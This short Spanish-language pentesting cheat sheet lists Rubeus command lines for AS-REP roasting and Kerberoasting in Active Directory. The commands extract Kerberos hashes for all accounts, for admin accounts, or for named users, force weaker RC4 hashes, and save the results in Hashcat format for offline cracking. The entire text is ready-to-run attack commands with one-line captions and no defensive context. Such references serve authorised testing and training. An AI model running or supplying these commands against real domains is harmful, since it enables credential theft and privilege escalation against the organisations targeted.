Rubeus.exe asreproast /nowrap
ASREPRoast Attack a un usuario en especifico y en formato Hashcat
Rubeus.exe asreproast /user:<USER> /nowrap /format:hashcat
Saber si hay cuentas Kerberoastables
Rubeus.exe kerberoast /stats
Kerberoasting Attack a todas las cuentas y guardar los hashes en un archivo
Rubeus.exe kerberoast /nowrap /outfile:hash
Kerberoasting Attack, obtener los hashes de todas las cuentas admins
Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Kerberoasting Attack, para un usuario en especifico que tenga el SPN configurado
Rubeus.exe kerberoast /user:<USER-NAME> /nowrap
Kerberoasting Attack, para un usuario en especifico que tenga el SPN configurado pero que el modo Hash que nos de sea siempre RC4
Rubeus.exe kerberoast /tgtdeleg /user:<USER-NAME> /nowrap
Kerberoasting Attack especificando usuario y contraseña de un usuario
Rubeus.exe kerberoast /creduser:<DOMAIN>\<USER> /credpassword:<PASSWORD> /outfile:hash
⬅️ Regresar